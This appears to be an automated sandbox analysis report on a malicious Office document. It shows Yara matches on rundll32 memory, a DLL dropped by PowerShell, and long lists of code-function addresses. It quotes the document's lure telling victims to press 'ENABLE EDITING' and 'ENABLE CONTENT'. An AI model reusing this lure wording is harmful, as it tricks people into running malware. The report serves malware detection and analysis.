Source: Yara match	File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,758 , C i N@m 13
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT buttons to preview this document. a
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT buttons to preview this
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT buttons to preview this document. a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5677
Source: unknown	Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5576	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Kizmwn\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207D7D	7_2_00207D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002089F6	7_2_002089F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F421E	7_2_001F421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C424	7_2_0020C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F8816	7_2_001F8816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FF813	7_2_001FF813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD013	7_2_001FD013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208831	7_2_00208831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F620A	7_2_001F620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F7605	7_2_001F7605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F903F	7_2_001F903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FA83A	7_2_001FA83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F7E34	7_2_001F7E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FDC2F	7_2_001FDC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020F411	7_2_0020F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4A2B	7_2_001F4A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2628	7_2_001F2628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1658	7_2_001F1658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208668	7_2_00208668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5856	7_2_001F5856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD44C	7_2_001FD44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F704B	7_2_001F704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FC07D	7_2_001FC07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00204E4B	7_2_00204E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C04C	7_2_0020C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201259	7_2_00201259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020CAA0	7_2_0020CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020C6AD	7_2_0020C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205AB8	7_2_00205AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5EB9	7_2_001F5EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F56B3	7_2_001F56B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00204693	7_2_00204693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F8CA3	7_2_001F8CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4EA1	7_2_001F4EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FD0DE	7_2_001FD0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002042E2	7_2_002042E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DEE8	7_2_0020DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F9CC8	7_2_001F9CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002006C2	7_2_002006C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020D2CB	7_2_0020D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FC6EF	7_2_001FC6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F94EC	7_2_001F94EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F9AE1	7_2_001F9AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020BF25	7_2_0020BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DB25	7_2_0020DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FCF11	7_2_001FCF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020D530	7_2_0020D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F213E	7_2_001F213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F492A	7_2_001F492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205115	7_2_00205115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020231B	7_2_0020231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00208F65	7_2_00208F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00202965	7_2_00202965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020676B	7_2_0020676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00200F6D	7_2_00200F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00207570	7_2_00207570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F3D4E	7_2_001F3D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00201B71	7_2_00201B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020DD78	7_2_0020DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00203D7C	7_2_00203D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FCB42	7_2_001FCB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00206B45	7_2_00206B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FA176	7_2_001FA176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020654F	7_2_0020654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002099A4	7_2_002099A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00205DAA	7_2_00205DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020EDB9	7_2_0020EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020E19F	7_2_0020E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F4BDE	7_2_001F4BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001FADCE	7_2_001FADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002037F4	7_2_002037F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B3FE	7_2_0020B3FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F6BC0	7_2_001F6BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002073C0	7_2_002073C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002077C0	7_2_002077C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00209DC0	7_2_00209DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002093C9	7_2_002093C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020CDCC	7_2_0020CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F2DEE	7_2_001F2DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0020B1D2	7_2_0020B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F5BE1	7_2_001F5BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022303C	7_2_0022303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00231E14	7_2_00231E14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A502C	7_2_002A502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC83F	7_2_002AC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC014	7_2_002AC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3856	7_2_002A3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299055	7_2_00299055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A10BB	7_2_002A10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A60B9	7_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C0B6	7_2_0029C0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A188F	7_2_002A188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD099	7_2_002AD099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A10E5	7_2_002A10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A893D	7_2_002A893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296134	7_2_00296134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A6934	7_2_002A6934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA972	7_2_002AA972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294152	7_2_00294152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00295155	7_2_00295155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029D1A3	7_2_0029D1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AE985	7_2_002AE985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AB998	7_2_002AB998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C9C0	7_2_0029C9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029923C	7_2_0029923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298217	7_2_00298217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00298A60	7_2_00298A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD2EC	7_2_002AD2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A6AE4	7_2_002A6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A32F0	7_2_002A32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A72F1	7_2_002A72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5AC3	7_2_002A5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002932C2	7_2_002932C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AE32D	7_2_002AE32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A531E	7_2_002A531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00292362	7_2_00292362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296B79	7_2_00296B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC340	7_2_002AC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002973A8	7_2_002973A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A43BF	7_2_002A43BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00291B9C	7_2_00291B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00290BCC	7_2_00290BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A7BDC	7_2_002A7BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029542D	7_2_0029542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002ABC21	7_2_002ABC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294C27	7_2_00294C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A3C07	7_2_002A3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029BC63	7_2_0029BC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD45C	7_2_002AD45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C485	7_2_0029C485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AB499	7_2_002AB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A04E1	7_2_002A04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A84D9	7_2_002A84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5CDF	7_2_002A5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A6D34	7_2_002A6D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299DAD	7_2_00299DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299DAE	7_2_00299DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A7DA5	7_2_002A7DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002965BF	7_2_002965BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002985B3	7_2_002985B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00297D8A	7_2_00297D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029ED87	7_2_0029ED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C587	7_2_0029C587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029B5F1	7_2_0029B5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294DCA	7_2_00294DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AB5C0	7_2_002AB5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029C652	7_2_0029C652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002916B2	7_2_002916B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A4689	7_2_002A4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293E9E	7_2_00293E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A1ED9	7_2_002A1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A8F18	7_2_002A8F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AD713	7_2_002AD713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A7F6A	7_2_002A7F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029577E	7_2_0029577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA746	7_2_002AA746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00293F9F	7_2_00293F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041620A	8_2_0041620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041DC2F	8_2_0041DC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041903F	8_2_0041903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00419CC8	8_2_00419CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042654F	8_2_0042654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041A176	8_2_0041A176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00423D7C	8_2_00423D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00427D7D	8_2_00427D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041492A	8_2_0041492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004293C9	8_2_004293C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004289F6	8_2_004289F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004237F4	8_2_004237F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042B3FE	8_2_0042B3FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00424E4B	8_2_00424E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041704B	8_2_0041704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041D44C	8_2_0041D44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042C04C	8_2_0042C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00415856	8_2_00415856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00411658	8_2_00411658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00421259	8_2_00421259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00428668	8_2_00428668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041C07D	8_2_0041C07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00417605	8_2_00417605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041F813	8_2_0041F813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041D013	8_2_0041D013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042F411	8_2_0042F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00418816	8_2_00418816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041421E	8_2_0041421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042C424	8_2_0042C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00412628	8_2_00412628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00414A2B	8_2_00414A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00428831	8_2_00428831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00417E34	8_2_00417E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041A83A	8_2_0041A83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004206C2	8_2_004206C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042D2CB	8_2_0042D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041D0DE	8_2_0041D0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004242E2	8_2_004242E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00419AE1	8_2_00419AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042DEE8	8_2_0042DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004194EC	8_2_004194EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0041C6EF	8_2_0041C6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00424693	8_2_00424693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00414EA1	8_2_00414EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042CAA0	8_2_0042CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00418CA3	8_2_00418CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0042C6AD	8_2_0042C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_004156B3	8_2_004156B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00415EB9	8_2_00415EB9
